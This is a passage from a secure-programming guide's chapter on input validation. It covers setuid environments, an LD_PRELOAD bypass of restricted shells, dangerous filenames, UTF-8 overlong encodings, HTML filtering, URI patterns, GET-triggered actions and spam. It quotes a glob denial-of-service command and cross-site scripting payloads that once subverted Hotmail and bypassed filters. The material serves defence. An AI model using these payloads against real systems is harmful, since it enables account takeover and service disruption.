If you’re programming a setuid/setgid program in a language that doesn’t allow you to reset the
environment directly, one approach is to create a “wrapper” program. The wrapper sets the environment
49
Chapter 5. Validate All Input
program to safe values, and then calls the other program. Beware: make sure the wrapper will actually
invoke the intended program; if it’s an interpreted program, make sure there’s no race condition possible
that would allow the interpreter to load a different program than the one that was granted the special
setuid/setgid privileges.
Given the similarities with certain other security issues, i’m surprised this hasn’t been discussed earlier. If it
has, people simply haven’t paid it enough attention.
This problem is not necessarily ssh-specific, though most telnet daemons that support environment passing
should already be configured to remove dangerous variables due to a similar (and more serious) issue back in
’95 (ref: [1]). I will give ssh-based examples here.
Scenario one: Let’s say admin bob has a host that he wants to give people ftp access to. Bob doesn’t want
anyone to have the ability to actually _log into_ his system, so instead of giving users normal shells, or even no
shells, bob gives them all (say) /usr/sbin/nologin, a program he wrote himself in C to essentially log the attempt
to syslog and exit, effectively ending the user’s session. As far as most people are concerned, the user can’t do
much with this aside from, say, setting up an encrypted tunnel.
The thing is, bob’s system uses dynamic libraries (as most do), and /usr/sbin/nologin is dynamically linked (as
most such programs are). If a user can set his environment variables (e.g. by uploading a “.ssh/environment”
file) and put some arbitrary file on the system (e.g. “doevilstuff.so”), he can bypass any functionality of
/usr/sbin/nologin completely via LD_PRELOAD (or another member of the LD_* environment family).
The user can now gain a shell on the system (with his own privileges, of course, barring any “UseLogin” issues
(ref: [2])), and administrator bob, if he were aware of what just occurred, would be extremely unhappy.
Granted, there are all kinds of interesting ways to (more or less) do away with this problem. Bob could just grit
his teeth and give the ftp users a nonexistent shell, or he could statically compile nologin, assuming his
operating system comes with static libraries. Bob could also, humorously, make his nologin program setuid and
let the standard C library take care of the situation. Then, of course, there are also the ssh-specific access
controls such as AllowGroup and AllowUsers. These may appease the situation in this scenario, but it does not
correct the problem.
... Now, what happens if bob, instead of using /usr/sbin/nologin, wants to use (for example) some BBS-type
interface that he wrote up or downloaded? It can be a script written in perl or tcl or python, or it could be a
compiled program; doesn’t matter. Additionally, bob need not be running an ftp server on this host; instead,
perhaps bob uses nfs or veritas to mount user home directories from a fileserver on his network; this exact setup
is (unfortunately) employed by many bastion hosts, password management hosts and mail servers---to name a
few. Perhaps bob runs an ISP, and replaces the user’s shell when he doesn’t pay. With all of these possible (and
common) scenarios, bob’s going to have a somewhat more difficult time getting around the problem.
50
Chapter 5. Validate All Input
... Exploitation of the problem is simple. The circumvention code would be compiled into a dynamic library
and LD_PRELOAD=/path/to/evil.so should be placed into ~user/.ssh/environment (a similar environment
option may be appended to public keys in the authohrized_keys file). If no dynamically loadable programs are
executed, this will have no effect.
ISPs and universities (along with similarly affected organizations) should compile their rejection (or otherwise
restricted) binaries statically (assuming your operating system comes with static libraries)...
Ideally, sshd (and all remote access programs that allow user-definable environments) should strip any
environment settings that libc ignores for setuid programs.
51
Chapter 5. Validate All Input
can be useful, but complex globs can take a great deal of computing time. For example, on some ftp
servers, performing a few of these requests can easily cause a denial-of-service of the entire machine:
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Trying to allow globbing, yet limit globbing patterns, is probably futile. Instead, make sure that any such
programs run as a separate process and use process limits to limit the amount of CPU and other resources
they can consume. See Section 7.4.8 for more information on this approach, and see Section 3.6 for more
information on how to set these limits.
Unix-like systems generally forbid including the NIL character in a filename (since this marks the end of
the name) and the “/” character (since this is the directory separator). However, they often permit
anything else, which is a problem; it is easy to write programs that can be subverted by cleverly-created
filenames.
Filenames that can especially cause problems include:
• Filenames with leading dashes (-). If passed to other programs, this may cause the other programs to
misinterpret the name as option settings. Ideally, Unix-like systems shouldn’t allow these filenames;
they aren’t needed and create many unnecessary security problems. Unfortunately, currently
developers have to deal with them. Thus, whenever calling another program with a filename, insert
“--” before the filename parameters (to stop option processing, if the program supports this common
request) or modify the filename (e.g., insert “./” in front of the filename to keep the dash from being
the lead character).
• Filenames with control characters. This especially includes newlines and carriage returns (which are
often confused as argument separators inside shell scripts, or can split log entries into multiple entries)
and the ESCAPE character (which can interfere with terminal emulators, causing them to perform
undesired actions outside the user’s control). Ideally, Unix-like systems shouldn’t allow these
filenames either; they aren’t needed and create many unnecessary security problems.
• Filenames with spaces; these can sometimes confuse a shell into being multiple arguments, with the
other arguments causing problems. Since other operating systems allow spaces in filenames (including
Windows and MacOS), for interoperability’s sake this will probably always be permitted. Please be
careful in dealing with them, e.g., in the shell use double-quotes around all filename parameters
whenever calling another program. You might want to forbid leading and trailing spaces at least; these
aren’t as visible as when they occur in other places, and can confuse human users.
• Invalid character encoding. For example, a program may believe that the filename is UTF-8 encoded,
but it may have an invalidly long UTF-8 encoding. See Section 5.11.2 for more information. I’d like to
see agreement on the character encoding used for filenames (e.g., UTF-8), and then have the operating
system enforce the encoding (so that only legal encodings are allowed), but that hasn’t happened at
this time.
• Another other character special to internal data formats, such as “<”, “;”, quote characters, backslash,
and so on.
52
Chapter 5. Validate All Input
53
Chapter 5. Validate All Input
arbitrary data to a web application. In general, servers must perform all their own input checking (of
form data, cookies, and so on) because they cannot trust clients to do this securely. In short, clients are
generally not “trustworthy channels”. See Section 7.12 for more information on trustworthy channels.
A brief discussion on input validation for those using Microsoft’s Active Server Pages (ASP) is available
from Jerry Connolly at http://heap.nologin.net/aspsec.html
54
Chapter 5. Validate All Input
55
Chapter 5. Validate All Input
Format and the CEN Format (European Community Standard); you’d like to permit both. Typical values
include “C” (the C locale), “EN” (English”), and “FR_fr” (French using the territory of France’s
conventions). Also, so many people use nonstandard names that programs have had to develop “alias”
systems to cope with nonstandard names (for GNU gettext, see /usr/share/locale/locale.alias, and for
X11, see /usr/lib/X11/locale/locale.alias; you might need "aliases" instead of "alias"); they should
usually be permitted as well. Libraries like gettext() have to accept all these variants and find an
appropriate value, where possible. One source of further information is FSF [1999]; another source is the
li18nux.org web site. A filter should not permit characters that aren’t needed, in particular “/” (which
might permit escaping out of the trusted directories) and “..” (which might permit going up one
directory). Other dangerous characters in NLSPATH include “%” (which indicates substitution) and “:”
(which is the directory separator); the documentation I have for other machines suggests that some
implementations may use them for other values, so it’s safest to prohibit them.
[A-Za-z][A-Za-z0-9_,+@\-\.=]*
I haven’t found any legitimate locale which doesn’t match this pattern, but this pattern does appear to
protect against locale attacks. Of course, there’s no guarantee that there are messages available in the
requested locale, but in such a case these routines will fall back to the default messages (usually in
English), which at least is not a security problem.
If you wish to be really picky, and only patterns that match li18nux’s locale pattern, you can use this
pattern instead:
^[A-Za-z]+(_[A-Za-z]+)?
(\.[A-Z]+(\-[A-Z0-9]+)*)?
(\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
(,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
In both cases, these patterns use POSIX’s extended (“modern”) regular expression notation (see regex(3)
and regex(7) on Unix-like systems).
Of course, languages cannot be supported without a standard way to represent their written symbols,
which brings us to the issue of character encoding.
56
Chapter 5. Validate All Input
• The classical US ASCII characters (0 to 0x7f) encode as themselves, so files and strings which contain
only 7-bit ASCII characters have the same encoding under both ASCII and UTF-8. This is fabulous
for backward compatibility with the many existing U.S. programs and data files.
• All UCS characters beyond 0x7f are encoded as a multibyte sequence consisting only of bytes in the
range 0x80 to 0xfd. This means that no ASCII byte can appear as part of another character. Many
other encodings permit characters such as an embedded NIL, causing programs to fail.
• It’s easy to convert between UTF-8 and a 2-byte or 4-byte fixed-width representations of characters
(these are called UCS-2 and UCS-4 respectively).
57
Chapter 5. Validate All Input
• The lexicographic sorting order of UCS-4 strings is preserved, and the Boyer-Moore fast search
algorithm can be used directly with UTF-8 data.
• All possible 2^31 UCS codes can be encoded using UTF-8.
• The first byte of a multibyte sequence which represents a single non-ASCII UCS character is always
in the range 0xc0 to 0xfd and indicates how long this multibyte sequence is. All further bytes in a
multibyte sequence are in the range 0x80 to 0xbf. This allows easy resynchronization; if a byte is
missing, it’s easy to skip forward to the “next” character, and it’s always easy to skip forward and back
to the “next” or “preceding” character.
In short, the UTF-8 transformation format is becoming a dominant method for exchanging international
text information because it can support all of the world’s languages, yet it is backward compatible with
U.S. ASCII files as well as having other nice properties. For many purposes I recommend its use,
particularly when storing data in a “text” file.
Implementers of UTF-8 need to consider the security aspects of how they handle illegal UTF-8 sequences. It is
conceivable that in some circumstances an attacker would be able to exploit an incautious UTF-8 parser by
sending it an octet sequence that is not permitted by the UTF-8 syntax.
A particularly subtle form of this attack could be carried out against a parser which performs security-critical
validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as
characters. For example, a parser might prohibit the NUL character when encoded as the single-octet sequence
00, but allow the illegal two-octet sequence C0 80 (illegal because it’s longer than necessary) and interpret it as
a NUL character (00). Another example might be a parser which prohibits the octet sequence 2F 2E 2E 2F
("/../"), yet permits the illegal octet sequence 2F C0 AE 2E 2F.
A longer discussion about this is available at Markus Kuhn’s UTF-8 and Unicode FAQ for Unix/Linux at
http://www.cl.cam.ac.uk/~mgk25/unicode.html.
58
Chapter 5. Validate All Input
should check that every character meets one of the patterns in the right-hand column. A “-” indicates a
range of legal values (inclusive). Of course, just because a sequence is a legal UTF-8 sequence doesn’t
mean that you should accept it (you still need to do all your other checking), but generally you should
check any UTF-8 data for UTF-8 legality before performing other checks.
UCS Code (Hex) Binary UTF-8 Format Legal UTF-8 Values (Hex)
00-7F 0xxxxxxx 00-7F
80-7FF 110xxxxx 10xxxxxx C2-DF 80-BF
800-FFF 1110xxxx 10xxxxxx 10xxxxxx E0 A0-BF 80-BF
1000-CFFF 1110xxxx 10xxxxxx 10xxxxxx E1-EC 80-BF 80-BF
D000-D7FF 1110xxxx 10xxxxxx 10xxxxxx ED 80-9F 80-BF
E000-FFFF 1110xxxx 10xxxxxx 10xxxxxx EE-EF 80-BF 80-BF
10000-3FFFF 11110xxx 10xxxxxx 10xxxxxx F0 90-BF 80-BF 80-BF
10xxxxxx
40000-FFFFF 11110xxx 10xxxxxx 10xxxxxx F1-F3 80-BF 80-BF 80-BF
10xxxxxx
100000-10FFFF 11110xxx 10xxxxxx 10xxxxxx F4 80-8F 80-BF 80-BF
10xxxxxx
As I noted earlier, there are two standards for character sets, ISO 10646 and Unicode, who have agreed
to synchronize their character assignments. The earlier definitions of UTF-8 in ISO/IEC 10646-1:2000
and the IETF RFC also supported five and six byte sequences to encode characters beyond U+10FFFF,
but such values can’t be used to support Unicode characters. IETF RFC 3629 modified the UTF-8
definition, and one of the changes was to specifically make any encodings beyond 4 bytes illegal (i.e.,
characters must be between U+0000 and U+10FFFF inclusively). Thus, the five and six byte UTF-8
encodings for characters beyon U+10FFFF aren’t legal any more, and you should normally reject them
(unless you have a special purpose for them).
This is set of valid values is tricky to determine, and in fact earlier versions of this document got some
entries wrong (in some cases it permitted overlong characters). Language developers should include a
function in their libraries to check for valid UTF-8 values, just because it’s so hard to get right.
I should note that in some cases, you might want to cut slack (or use internally) the hexadecimal
sequence C0 80. This is an overlong sequence that, if permitted, can represent ASCII NUL (NIL). Since
C and C++ have trouble including a NIL character in an ordinary string, some people have taken to using
this sequence when they want to represent NIL as part of the data stream; Java even enshrines the
practice. Feel free to use C0 80 internally while processing data, but technically you really should
translate this back to 00 before saving the data. Depending on your needs, you might decide to be
“sloppy” and accept C0 80 as input in a UTF-8 data stream. If it doesn’t harm security, it’s probably a
good practice to accept this sequence since accepting it aids interoperability.
Handling this can be tricky. You might want to examine the C routines developed by Unicode to handle
conversions, available at ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c. It’s unclear
to me if these routines are open source software (the licenses don’t clearly say whether or not they can be
59
Chapter 5. Validate All Input
60
Chapter 5. Validate All Input
61
Chapter 5. Validate All Input
In XML, this is termed “well-formed” data. A few exceptions could be made if you’re accepting standard
HTML (e.g., supporting an implied </p> where not provided before a <p> would be fine), but trying to
accept HTML in its full generality (which can infer balancing closing tags in many cases) is not needed
for most applications. Indeed, if you’re trying to stick to XHTML (instead of HTML), then
well-formedness is a requirement. Also, HTML tags are case-insensitive; tags can be upper case, lower
case, or a mixture. However, if you intend to accept XHTML then you need to require all tags to be in
lower case (XML is case-sensitive; XHTML uses XML and requires the tags to be in lower case).
Here are a few random tips about doing this. Usually you should design whatever surrounds the HTML
text and the set of permitted tags so that the contributed text cannot be misinterpreted as text from the
“main” site (to prevent forgeries). Don’t accept any attributes unless you’ve checked the attribute type
and its value; there are many attributes that support things such as Javascript that can cause trouble for
your users. You’ll notice that in the above list I didn’t include any attributes at all, which is certainly the
safest course. You should probably give a warning message if an unsafe tag is used, but if that’s not
practical, encoding the critical characters (e.g., "<" becomes "<") prevents data loss while
simultaneously keeping the users safe.
Be careful when expanding this set, and in general be restrictive of what you accept. If your patterns are
too generous, the browser may interpret the sequences differently than you expect, resulting in a
potential exploit. For example, FozZy posted on Bugtraq (1 April 2002) some sequences that permitted
exploitation in various web-based mail systems, which may give you an idea of the kinds of problems
you need to defend against. Here’s some exploit text that, at one time, could subvert user accounts in
Microsoft Hotmail:
<SCRIPT>
</COMMENT>
<!-- --> -->
<_a<script>
<<script> (Note: this was found by BugSan)
Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various text that invokes Javascript yet
manages to bypass many filters. Here are his examples (which he says he cut and pasted from elsewhere);
some only apply to specific browsers (IE means Internet Explorer, N4 means Netscape version 4).
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
62
Chapter 5. Validate All Input
This is not a complete list, of course, but it at least is a sample of the kinds of attacks that you must
prevent by strictly limiting the tags and attributes you can allow from untrusted users.
Konstantin Riabitsev has posted some PHP code to filter HTML (GPL); I’ve not examined it closely, but
you might want to take a look.
63
Chapter 5. Validate All Input
scheme://authority[path][?query][#fragment]
A URI starts with a scheme name (such as “http”), the characters “://”, the authority (such as
“www.dwheeler.com”), a path (which looks like a directory or file name), a question mark followed by a
query, and a hash (“#”) followed by a fragment identifier. The square brackets surround optional portions
- e.g., many URIs don’t actually include the query or fragment. Some schemes may not permit some of
the data (e.g., paths, queries, or fragments), and many schemes have additional requirements unique to
them. Many schemes permit the “authority” field to identify optional usernames, passwords, and ports,
using this syntax for the “authority” section:
[username[:password]@]host[:portnumber]
The “host” can either be a name (“www.dwheeler.com”) or an IPv4 numeric address (127.0.0.1). A
“relative” URI references one object relative to the “current” one, and its syntax looks a lot like a
filename:
path[?query][#fragment]
There are a limited number of characters permitted in most of the URI, so to get around this problem,
other 8-bit characters may be “URL encoded” as %hh (where hh is the hexadecimal value of the 8-bit
character). For more detailed information on valid URIs, see IETF RFC 2396 and its related
specifications.
Now that we’ve looked at the syntax of URIs, let’s examine the risks of each part:
• Scheme: Many schemes are downright dangerous. Permitting someone to insert a “javascript” scheme
into your material would allow them to trivially mount denial-of-service attacks (e.g., by repeatedly
creating windows so the user’s machine freezes or becomes unusable). More seriously, they might be
able to exploit a known vulnerability in the javascript implementation. Some schemes can be a
nuisance, such as “mailto:” when a mailing is not expected, and some schemes may not be sufficiently
secure on the client machine. Thus, it’s necessary to limit the set of allowed schemes to just a few safe
schemes.
• Authority: Ideally, you should limit user links to “safe” sites, but this is difficult to do in practice.
However, you can certainly do something about usernames, passwords, and port numbers: you should
forbid them. Systems expecting usernames (especially with passwords!) are probably guarding more
important material; rarely is this needed in publicly-posted URIs, and someone could try to use this
functionality to convince users to expose information they have access to and/or use it to modify the
information. Such URIs permit semantic attacks; see Section 7.17 for more information. Usernames
without passwords are no less dangerous, since browsers typically cache the passwords. You should
not usually permit specification of ports, because different ports expect different protocols and the
resulting “protocol confusion” can produce an exploit. For example, on some systems it’s possible to
use the “gopher” scheme and specify the SMTP (email) port to cause a user to send email of the
attacker’s choosing. You might permit a few special cases (e.g., http ports 8008 and 8080), but on the
whole it’s not worth it. The host when specified by name actually has a fairly limited character set
(using the DNS standards). Technically, the standard doesn’t permit the underscore (“_”) character, but
Microsoft ignored this part of the standard and even requires the use of the underscore in some
circumstances, so you probably should allow it. Also, there’s been a great deal of work on supporting
international characters in DNS names, which is not further discussed here.
64
Chapter 5. Validate All Input
• Path: Permitting a path is usually okay, but unfortunately some applications use part of the path as
query data, creating an opening we’ll discuss next. Also, paths are allowed to contain phrases like “..”,
which can expose private data in a poorly-written web server; this is less a problem than it once was
and really should be fixed by the web server. Since it’s only the phrase “..” that’s special, it’s
reasonable to look at paths (and possibly query data) and forbid “../” as a content. However, if your
validator permits URL escapes, this can be difficult; now you need to prevent versions where some of
these characters are escaped, and may also have to deal with various “illegal” character encodings of
these characters as well.
• Query: Query formats (beginning with "?") can be a security risk because some query formats actually
cause actions to occur on the serving end. They shouldn’t, and your applications shouldn’t, as
discussed in Section 5.14 for more information. However, we have to acknowledge the reality as a
serious problem. In addition, many web sites are actually “redirectors” - they take a parameter
specifying where the user should be redirected, and send back a command redirecting the user to the
new location. If an attacker references such sites and provides a more dangerous URI as the
redirection value, and the browser blithely obeys the redirection, this could be a problem. Again, the
user’s browser should be more careful, but not all user browsers are sufficiently cautious. Also, many
web applications have vulnerabilities that can be exploited with certain query values, but in general
this is hard to prevent. The official URI specifications don’t sanction the “+” (plus) character, but in
practice the “+” character often represents the space character.
• Fragment: Fragments basically locate a portion of a document; I’m unaware of an attack based on
fragments as long as the syntax is legal, but the legality of its syntax does need checking. Otherwise,
an attacker might be able to insert a character such as the double-quote (") and prematurely end the
URI (foiling any checking).
• URL escapes: URL escapes are useful because they can represent arbitrary 8-bit characters; they can
also be very dangerous for the same reasons. In particular, URL escapes can represent control
characters, which many poorly-written web applications are vulnerable to. In fact, with or without
URL escapes, many web applications are vulnerable to certain characters (such as backslash,
ampersand, etc.), but again this is difficult to generalize.
• Relative URIs: Relative URIs should be reasonably safe (if you manage the web site well), although in
some applications there’s no good reason to allow them either.
Of course, there is a trade-off with simplicity as well. Simple patterns are easier to understand, but they
aren’t very refined (so they tend to be too permissive or too restrictive, even more than a refined pattern).
Complex patterns can be more exact, but they are more likely to have errors, require more performance
to use, and can be hard to implement in some circumstances.
Here’s my suggestion for a “simple mostly safe” URI pattern which is very simple and can be
implemented “by hand” or through a regular expression; permit the following pattern:
(http|ftp|https)://[-A-Za-z0-9._/]+
This pattern doesn’t permit many potentially dangerous capabilities such as queries, fragments, ports, or
relative URIs, and it only permits a few schemes. It prevents the use of the “%” character, which is used
in URL escapes and can be used to specify characters that the server may not be prepared to handle.
Since it doesn’t permit either “:” or URL escapes, it doesn’t permit specifying port numbers, and even
using it to redirect to a more dangerous URI would be difficult (due to the lack of the escape character).
65
Chapter 5. Validate All Input
It also prevents the use of a number of other characters; again, many poorly-designed web applications
can’t handle a number of “unexpected” characters.
Even this “mostly safe” URI permits a number of questionable URIs, such as subdirectories (via “/”) and
attempts to move up directories (via ‘..”); illegal queries of this kind should be caught by the server. It
permits some illegal host identifiers (e.g., “20.20”), though I know of no case where this would be a
security weakness. Some web applications treat subdirectories as query data (or worse, as command
data); this is hard to prevent in general since finding “all poorly designed web applications” is hopeless.
You could prevent the use of all paths, but this would make it impossible to reference most Internet
information. The pattern also allows references to local server information (through patterns such as
"http:///", "http://localhost/", and "http://127.0.0.1") and access to servers on an internal network; here
you’ll have to depend on the servers correctly interpreting the resulting HTTP GET request as solely a
request for information and not a request for an action, as recommended in Section 5.14. Since query
forms aren’t permitted by this pattern, in many environments this should be sufficient.
Unfortunately, the “mostly safe” pattern also prevents a number of quite legitimate and useful URIs. For
example, many web sites use the “?” character to identify specific documents (e.g., articles on a news
site). The “#” character is useful for specifying specific sections of a document, and permitting relative
URIs can be handy in a discussion. Various permitted characters and URL escapes aren’t included in the
“mostly safe” pattern. For example, without permitting URL escapes, it’s difficult to access many
non-English pages. If you truly need such functionality, then you can use less safe patterns, realizing that
you’re exposing your users to higher risk while giving your users greater functionality.
One pattern that permits queries, but at least limits the protocols and ports used is the following, which
I’ll call the “simple somewhat safe pattern”:
(http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\’\(\)\%\?]+))*/?
This pattern actually isn’t very smart, since it permits illegal escapes, multiple queries, queries in ftp, and
so on. It does have the advantage of being relatively simple.
Creating a “somewhat safe” pattern that really limits URIs to legal values is quite difficult. Here’s my
current attempt to do so, which I call the “sophisticated somewhat safe pattern”, expressed in a form
where whitespace is ignored and comments are introduced with "#":
(
(
# Handle http, https, and relative URIs:
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
([A-Za-z0-9\-\_\.\!\~\*\’\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
((/([A-Za-z0-9\-\_\.\!\~\*\’\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\?( # query:
(([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
(\&([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
|
(([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+ # isindex
)
))?
(\#([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)|
# Handle ftp:
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
((/([A-Za-z0-9\-\_\.\!\~\*\’\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
66
Chapter 5. Validate All Input
)
)
Even the sophisticated pattern shown above doesn’t forbid all illegal URIs. For example, again, "20.20"
isn’t a legal domain name, but it’s allowed by the pattern; however, to my knowledge this shouldn’t cause
any security problems. The sophisticated pattern forbids URL escapes that represent control characters
(e.g., %00 through $1F) - the smallest permitted escape value is %20 (ASCII space). Forbidding control
characters prevents some trouble, but it’s also limiting; change "2-9" to "0-9" everywhere if you need to
support sending all control characters to arbitrary web applications. This pattern does permit all other
URL escape values in paths, which is useful for international characters but could cause trouble for a few
systems which can’t handle it. The pattern at least prevents spaces, linefeeds, double-quotes, and other
dangerous characters from being in the URI, which prevents other kinds of attacks when incorporating
the URI into a generated document. Note that the pattern permits “+” in many places, since in practice
the plus is often used to replace the space character in queries and fragments.
Unfortunately, as noted above, there are attacks which can work through any technique that permit query
data, and there don’t seem to be really good defenses for them once you permit queries. So, you could
strip out the ability to use query data from the pattern above, but permit the other forms, producing a
“sophisticated mostly safe” pattern:
(
(
# Handle http, https, and relative URIs:
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
([A-Za-z0-9\-\_\.\!\~\*\’\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
((/([A-Za-z0-9\-\_\.\!\~\*\’\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)|
# Handle ftp:
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
((/([A-Za-z0-9\-\_\.\!\~\*\’\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\’\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)
)
As far as I can tell, as long as these patterns are only used to check hypertext anchors selected by the user
(the "<a>" tag) this approach also prevents the insertion of “web bugs”. Web bugs are simply text that
allow someone other than the originating web server of the main page to track information such as who
read the content and when they read it - see Section 8.7 for more information. This isn’t true if you use
the <img> (image) tag with the same checking rules - the image tag is loaded immediately, permitting
someone to add a “web bug”. Once again, this presumes that you’re not permitting any attributes; many
attributes can be quite dangerous and pierce the security you’re trying to provide.
Please note that all of these patterns require the entire URI match the pattern. An unfortunate fact of
these patterns is that they limit the allowable patterns in a way that forbids many useful ones (e.g., they
prevent the use of new URI schemes). Also, none of them can prevent the very real problem that some
web sites perform more than queries when presented with a query - and some of these web sites are
internal to an organization. As a result, no URI can really be safe until there are no web sites that accept
GET queries as an action (see Section 5.14). For more information about legal URLs/URIs, see IETF
RFC 2396; domain name syntax is further discussed in IETF RFC 1034.
67
Chapter 5. Validate All Input
68
Chapter 5. Validate All Input
link), or even just view a page (in the case of transcluded information such as images from HTML’s img
tag), the victim will perform a GET. When the GET is performed, all of the form data created by the
attacker will be sent by the victim to the link specified. This is a cross-site malicious content attack, as
discussed further in Section 7.16.
If the only action that a malicious cross-site content attack can perform is to make the user view
unexpected data, this isn’t as serious a problem. This can still be a problem, of course, since there are
some attacks that can be made using this capability. For example, there’s a potential loss of privacy due
to the user requesting something unexpected, possible real-world effects from appearing to request
illegal or incriminating material, or by making the user request the information in certain ways the
information may be exposed to an attacker in ways it normally wouldn’t be exposed. However, even
more serious effects can be caused if the malicious attacker can cause not just data viewing, but changes
in data, through a cross-site link.
Typical HTTP interfaces (such as most CGI libraries) normally hide the differences between GET and
POST, since for getting data it’s useful to treat the methods “the same way.” However, for actions that
actually cause something other than a data query, check to see if the request is something other than
POST; if it is, simply display a filled-in form with the data given and ask the user to confirm that they
really mean the request. This will prevent cross-site malicious content attacks, while still giving users the
convenience of confirming the action with a single click.
Indeed, this behavior is strongly recommended by the HTTP specification. According to the HTTP 1.1
specification (IETF RFC 2616 section 9.1.1), “the GET and HEAD methods SHOULD NOT have the
significance of taking an action other than retrieval. These methods ought to be considered ‘safe’. This
allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so
that the user is made aware of the fact that a possibly unsafe action is being requested.”
In the interest of fairness, I should note that this doesn’t completely solve the problem, because on some
browsers (in some configurations) scripted posts can do the same thing. For example, imagine a web
browser with ECMAscript (Javascript) enabled receiving the following HTML snippet - on some
browsers, simply displaying this HTML snippet will automatically force the user to send a POST request
to a website chosen by the attacker, with form data defined by the attacker:
My thanks to David deVitry pointing this out. However, although this advice doesn’t solve all problems,
it’s still worth doing. In part, this is because the remaining problem can be solved by smarter web
browsers (e.g., by always confirming the data before allowing ECMAscript to send a web form) or by
web browser configuration (e.g., disabling ECMAscript). Also, this attack doesn’t work in many
cross-site scripting exploits, because many websites don’t allow users to post “script” commands but do
allow arbitrary URL links. Thus, limiting the actions a GET command can perform to queries
significantly improves web application security.
69
Chapter 5. Validate All Input
Spam is the usual name for unsolicited bulk email (UBE) or mass unsolicited email. It’s also sometimes
called unsolicited commercial email (UCE), though that name is misleading - not all spam is
commercial. For a discussion of why spam is such a serious problem and more general discussion about
it, see my essay at http://www.dwheeler.com/essays/stopspam.html, as well as http://mail-abuse.org/,
http://spam.abuse.net/, CAUCE, and IETF RFC 2635. Spam receivers and intermediaries bear most of
the cost of spam, while the spammer spends very little to send it. Therefore many people regard spam as
a theft of service, not just some harmless activity, and that number increases as the amount of spam
increases.
If your program can be used to generate email sent to others (such as a mail transfer agent, generator of
data sent by email, or a mailing list manager), be sure to write your program to prevent its unauthorized
use as a mail relay. A program should usually only allow legitimate authorized users to send email to
others (e.g., those inside that company’s mail server or those legitimately subscribed to the service).
More information about this is in IETF RFC 2505 Also, if you manage a mailing list, make sure that it
can enforce the rule that only subscribers can post to the list, and create a “log in” feature that will make
it somewhat harder for spammers to subscribe, spam, and unsubscribe easily.
One way to more directly counter SPAM is to incorporate support for the MAPS (Mail Abuse Prevention
System LLC) RBL (Realtime Blackhole List), which maintains in real-time a list of IP addresses where
SPAM is known to originate. For more information, see http://mail-abuse.org/rbl/. Many current Mail
Transfer Agents (MTAs) already support the RBL; see their websites for how to configure them. The
usual way to use the RBL is to simply refuse to accept any requests from IP addresses in the blackhole
list; this is harsh, but it solves the problem. Another similar service is the Open Relay Database (ORDB)
at http://ordb.org, which identifies dynamically those sites that permit open email relays (open email
relays are misconfigured email servers that allow spammers to send email through them). Another
location for more information is SPEWS. I believe there are other similar services as well.
I suggest that many systems and programs, by default, enable spam blocking if they can send email on to
others whose identity is under control of a remote user - and that includes MTAs. At the least, consider
this. There are real problems with this suggestion, of course - you might (rarely) inhibit communication
with a legitimate user. On the other hand, if you don’t block spam, then it’s likely that everyone else will
blackhole your system (and thus ignore your emails). It’s not a simple issue, because no matter what you
do, some people will not allow you to send them email. And of course, how well do you trust the
organization keeping up the real-time blackhole list - will they add truly innocent sites to the blackhole
list, and will they remove sites from the blackhole list once all is okay? Thus, it becomes a trade-off - is it
more important to talk to spammers (and a few innocents as well), or is it more important to talk to those
many other systems with spam blocks (losing those innocents who share equipment with spammers)?
Obviously, this must be configurable. This is somewhat controversial advice, so consider your options
for your circumstance.
70
Chapter 5. Validate All Input
Notes
1. Technically, a hypertext link can be any “uniform resource identifier” (URI). The term “Uniform
Resource Locator” (URL) refers to the subset of URIs that identify resources via a representation of
their primary access mechanism (e.g., their network "location"), rather than identifying the resource
by name or by some other attribute(s) of that resource. Many people use the term “URL” as
